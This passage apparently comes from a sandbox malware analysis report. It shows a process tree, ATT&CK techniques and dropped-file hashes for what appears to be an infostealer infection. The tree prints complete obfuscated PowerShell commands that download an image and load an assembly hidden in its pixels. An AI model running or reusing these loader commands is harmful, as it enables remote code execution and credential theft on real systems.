109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d "
        9⤵
        An obfuscated cmd.exe command-line is typically used to evade detection.
        
        PID:6956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\deleteSelf.bat" "
        9⤵
        
        PID:2628
        
        C:\Users\Admin\10009150102\7749.exe
        
        "C:\Users\Admin\10009150102\7749.exe"
        8⤵
        
        PID:5388
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(83,101,116,45,80,83,82,101,97,100,76,105,110,101,79,112,116,105,111,110,32,45,72,105,115,116,111,114,121,83,97,118,101,83,116,121,108,101,32,83,97,118,101,78,111,116,104,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,99,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,71,71,86,57,54,48,52,76,103,46,66,109,112,34,13,10,36,109,101,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,99,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,101,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,13,10,36,109,101,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,101,109,115,41,13,10,13,10,36,101,110,99,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,13,10,13,10,36,98,105,116,100,32,61,32,36,105,109,103,49,46,76,111,99,107,66,105,116,115,40,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,82,101,99,116,97,110,103,108,101,93,58,58,70,114,111,109,76,84,82,66,40,48,44,32,48,44,32,36,105,109,103,49,46,87,105,100,116,104,44,32,36,105,109,103,49,46,72,101,105,103,104,116,41,44,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,105,110,103,46,73,109,97,103,101,76,111,99,107,77,111,100,101,93,58,58,82,101,97,100,79,110,108,121,44,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,105,110,103,46,80,105,120,101,108,70,111,114,109,97,116,93,58,58,70,111,114,109,97,116,51,50,98,112,112,65,114,103,98,41,13,10,36,115,99,48,49,32,61,32,36,98,105,116,100,46,83,99,97,110,48,13,10,36,115,116,114,105,49,32,61,32,36,98,105,116,100,46,83,116,114,105,100,101,13,10,13,10,13,10,102,111,114,32,40,36,121,32,61,32,48,59,32,36,121,32,45,108,116,32,36,105,109,103,49,46,72,101,105,103,104,116,59,32,36,121,43,43,41,32,123,13,10,32,32,32,32,102,111,114,32,40,36,120,32,61,32,48,59,32,36,120,32,45,108,116,32,36,105,109,103,49,46,87,105,100,116,104,59,32,36,120,43,43,41,32,123,13,10,32,32,32,32,32,32,32,32,36,112,105,120,101,108,79,102,102,115,101,116,32,61,32,36,121,32,42,32,36,115,116,114,105,49,32,43,32,36,120,32,42,32,52,13,10,32,32,32,32,32,32,32,32,36,98,121,116,101,32,61,32,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,82,101,97,100,66,121,116,101,40,36,115,99,48,49,44,32,36,112,105,120,101,108,79,102,102,115,101,116,41,13,10,32,32,32,32,32,32,32,32,36,101,110,99,46,65,100,100,40,36,98,121,116,101,41,13,10,32,32,32,32,125,13,10,125,13,10,13,10,13,10,36,105,109,103,49,46,85,110,108,111,99,107,66,105,116,115,40,36,98,105,116,100,41,13,10,13,10,36,97,115,115,101,109,98,108,121,32,61,32,91,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,40,36,101,110,99,46,84,111,65,114,114,97,121,40,41,41,13,10,36,97,115,115,101,109,98,108,121,46,69,110,116,114,121,80,111,105,110,116,46,73,110,118,111,107,101,40,36,110,117,108,108,44,32,64,40,41,41,13,10,13,10)))); } c #c "
        9⤵
        An obfuscated cmd.exe command-line is typically used to evade detection.
        
        PID:2420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(83,101,116,45,80,83,82,101,97,100,76,105,110,101,79,112,116,105,111,110,32,45,72,105,115,116,111,114,121,83,97,118,101,83,116,121,108,101,32,83,97,118,101,78,111,116,104,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,99,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,71,71,86,57,54,48,52,76,103,46,66,109,112,34,13,10,36,109,101,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,99,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,101,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,13,10,36,109,101,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,101,109,115,41,13,10,13,10,36,101,110,99,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,13,10,13,10,36,98,105,116,100,32,61,32,36,105,109,103,49,46,76,111,99,107,66,105,116,115,40,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,82,101,99,116,97,110,103,108,101,93,58,58,70,114,111,109,76,84,82,66,40,48,44,32,48,44,32,36,105,109,103,49,46,87,105,100,116,104,44,32,36,105,109,103,49,46,72,101,105,103,104,116,41,44,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,105,110,103,46,73,109,97,103,101,76,111,99,107,77,111,100,101,93,58,58,82,101,97,100,79,110,108,121,44,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,105,110,103,46,80,105,120,101,108,70,111,114,109,97,116,93,58,58,70,111,114,109,97,116,51,50,98,112,112,65,114,103,98,41,13,10,36,115,99,48,49,32,61,32,36,98,105,116,100,46,83,99,97,110,48,13,10,36,115,116,114,105,49,32,61,32,36,98,105,116,100,46,83,116,114,105,100,101,13,10,13,10,13,10,102,111,114,32,40,36,121,32,61,32,48,59,32,36,121,32,45,108,116,32,36,105,109,103,49,46,72,101,105,103,104,116,59,32,36,121,43,43,41,32,123,13,10,32,32,32,32,102,111,114,32,40,36,120,32,61,32,48,59,32,36,120,32,45,108,116,32,36,105,109,103,49,46,87,105,100,116,104,59,32,36,120,43,43,41,32,123,13,10,32,32,32,32,32,32,32,32,36,112,105,120,101,108,79,102,102,115,101,116,32,61,32,36,121,32,42,32,36,115,116,114,105,49,32,43,32,36,120,32,42,32,52,13,10,32,32,32,32,32,32,32,32,36,98,121,116,101,32,61,32,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,82,101,97,100,66,121,116,101,40,36,115,99,48,49,44,32,36,112,105,120,101,108,79,102,102,115,101,116,41,13,10,32,32,32,32,32,32,32,32,36,101,110,99,46,65,100,100,40,36,98,121,116,101,41,13,10,32,32,32,32,125,13,10,125,13,10,13,10,13,10,36,105,109,103,49,46,85,110,108,111,99,107,66,105,116,115,40,36,98,105,116,100,41,13,10,13,10,36,97,115,115,101,109,98,108,121,32,61,32,91,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,40,36,101,110,99,46,84,111,65,114,114,97,121,40,41,41,13,10,36,97,115,115,101,109,98,108,121,46,69,110,116,114,121,80,111,105,110,116,46,73,110,118,111,107,101,40,36,110,117,108,108,44,32,64,40,41,41,13,10,13,10)))); } c #c
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\deleteSelf.bat" "
        9⤵
        
        PID:5456
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
        8⤵
        
        PID:5996
      - C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"
        6⤵
        
        PID:7120
  - - C:\Users\Admin\AppData\Local\Temp\1011465001\e4bf8a11f7.exe
      "C:\Users\Admin\AppData\Local\Temp\1011465001\e4bf8a11f7.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:7048
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 1500
        5⤵
        Program crash
        
        PID:6816
  - - C:\Users\Admin\AppData\Local\Temp\1011466001\8f3dd0e015.exe
      "C:\Users\Admin\AppData\Local\Temp\1011466001\8f3dd0e015.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:5804
  - - C:\Users\Admin\AppData\Local\Temp\1011467001\f680663ba9.exe
      "C:\Users\Admin\AppData\Local\Temp\1011467001\f680663ba9.exe"
      4⤵
      Executes dropped EXE
      PID:5740
  - - C:\Users\Admin\AppData\Local\Temp\1011468001\60fb84b2fe.exe
      "C:\Users\Admin\AppData\Local\Temp\1011468001\60fb84b2fe.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:4980
  - - C:\Users\Admin\AppData\Local\Temp\1011469001\cf2d2ab250.exe
      "C:\Users\Admin\AppData\Local\Temp\1011469001\cf2d2ab250.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      System Location Discovery: System Language Discovery
      PID:3560
  - - C:\Users\Admin\AppData\Local\Temp\1011470001\8af6533e1e.exe
      "C:\Users\Admin\AppData\Local\Temp\1011470001\8af6533e1e.exe"
      4⤵
      PID:3024
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:5864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:6392

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:6988
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3236 -ip 3236
  2⤵
  PID:5152
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7048 -ip 7048
  2⤵
  PID:5260
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6376 -ip 6376
  2⤵
  PID:3180
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5072 -ip 5072
  2⤵
  PID:32
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 5072 -ip 5072
  2⤵
  PID:5652
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6856 -ip 6856
  2⤵
  PID:7092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\AEBAKJDG

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\ProgramData\JJDBAEHI

Filesize
114KB

MD5
ab87d892a202f83f7e925c5e294069e8

SHA1
0b86361ff41417a38ce3f5b5250bb6ecd166a6a1

SHA256
bdc61a1c60fe8c08fe7a5256e9c8d7ad1ba4dd0963a54357c484256fc8834130

SHA512
f9a03eaae52d7fb544047fea3ffa7d8c6f7debdbb907348adfc46545e7b6c3783427983f16885ae138e43e51eec6ce73520c38581e4d9bb7140beeae2137de41

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\10002870122\UpdatedAdmin.cmd

Filesize
9.6MB

MD5
35938e0af674aab536c0e050bb885d1e

SHA1
0068107c00ad5936888faffccc5801af417a8572

SHA256
98902b01800ee800149edca1e1ff8338cd9596a783ca1b0ceefad093140ce4c1

SHA512
91b0065811aa5cdbd2bfd7dd744f6b2e5d974645b9d368196cd5fa663e1866f0c8b513ff4ed484a9b2dd2e5e63d73e8b83937430d9f457c20053b3a0a4998024

Download Submit
C:\Users\Admin\10009130102\Properties.exe

Filesize
9KB

MD5
78962843f4337ae239e4ea040e282ebe

SHA1
3eb745467ac5b0dcc33e7aa5c8fe7cdfb28f9a94

SHA256
344614a3359f01148a54ca80e497b339f882f03811e97f04804680e21befdd84

SHA512
a4e2e9edf1053ed43af58a0591b1d6885e37f08c68770c7826dab08d2633eb7bd32628f1b15f62894e9fd3e339f2a4833aef5515f90a4b2318a3f556d93d059c

Download Submit
C:\Users\Admin\10009150102\7749.exe

Filesize
13KB

MD5
d4f004edd16ee6efd52c0b869464b361

SHA1
f2957f64d64c5fbeb1164d6f405a56798e83cd01

SHA256
acefc1ea003f806d5a54f0277eb4bcbf7eb0d82635eb3b48d6a3c285a9acce3f

SHA512
0905ccb5fdf41dd268ce5adc3197cf63e0194f6f68a65c7ebf2e698cbdafc2e068a4984a71cb0f17a78d9d1259a6a7813df95124b9cd204da7da3b878f22ac32

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
938ffc2cba917b243d86b2cf76dcefb4

SHA1
234b53d91d075f16cc63c731eefdae278e2faad3

SHA256
5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

SHA512
e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ed93835c738b8d8b4e8d343b01ec65ac

SHA1
eafa6a13799b8053bf5be156dc9efcd3447e98d8

SHA256
1adb8261b2666bd17b231877112e4cc29b550f302f9ac36838e94449f10ef917

SHA512
adde9c66f543ad3b3a24c88c96155e1d1cadd6fd83c80349e8d1d3f535212b27ff0102956e4fe336a369c83f6afe493fdbe0a95704035eda8901387318f23d00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\PTWQX4L2\download[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
20KB

MD5
1526779724d364c42177f465ebe0e6d6

SHA1
d88579f15076f84990a569c62ddb8992990c4cb0

SHA256
a1f9c63da5d9d9d2389f2cd5f6d35644bb8becf4eb49433e0bf0b35a9dc804d0

SHA512
411952f507fb80da60febac90a970f3599faa9030055137adcbeb7f9e54f80c71939815237b13cf3f8dc2c54a64fe7f5f4331e95406ff9e6445bac61f11092df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
990fd07ad4559b5074b6a147283899a4

SHA1
b75e3cdc17599c947f1a93c0ec7abeeae8a13169

SHA256
efa30c882892c8ef31ffa4489279710a64dabd676efd2c7329df9a9702aafc09

SHA512
4a2bf83cf483d2fdc48348f893a99fe299a9cde799c2bd6f3a26f134cf797259369b7727eb7b10a025ed2ff33c1557fe9bfee63c80fa7d0fd1a0d5fdcd0ff5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4b7d6f983d6f6e3f9948b93115c7c238

SHA1
d93d365ee30ebd8afbfbe3c0e2532c13476c97ea

SHA256
77bad1c3ddcd08b62f9c40dd7a9db9ca3e7eda63bf30278b0b184eba7f18e316

SHA512
4f749201391b32db37e13c420864c0fba49096c239fd89ffd6740b0bc8e8eb4d0107fb71a1b4f119ec3ca9dd567ab68da2b97a008f053fa1982aa3404d5d5bbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
11091cb5cdfc6dabbcb7a0e576a1c803

SHA1
6fe7cb37cbf8333ae9d17a47527481b551af58c8

SHA256
690b6734ff9e7364cd6b7fca8b230457a9c705bcad090c3340d470e6a81068ed

SHA512
3b8aef2b561c0b11db0a79d091c0681b36082982cecb931fe30c24914ec16e78a4d2b631e7696e9b998c0a42379a7824cb1a82d6261d572141f090c5e3ec15cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

Filesize
307KB

MD5
68a99cf42959dc6406af26e91d39f523

SHA1
f11db933a83400136dc992820f485e0b73f1b933

SHA256
c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3

SHA512
7342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe

Filesize
1.1MB

MD5
0984009f07548d30f9df551472e5c399

SHA1
a1339aa7c290a7e6021450d53e589bafa702f08a

SHA256
80ec0ec77fb6e4bbb4f01a2d3b8d867ddd0dfe7abdb993ef1401f004c18377be

SHA512
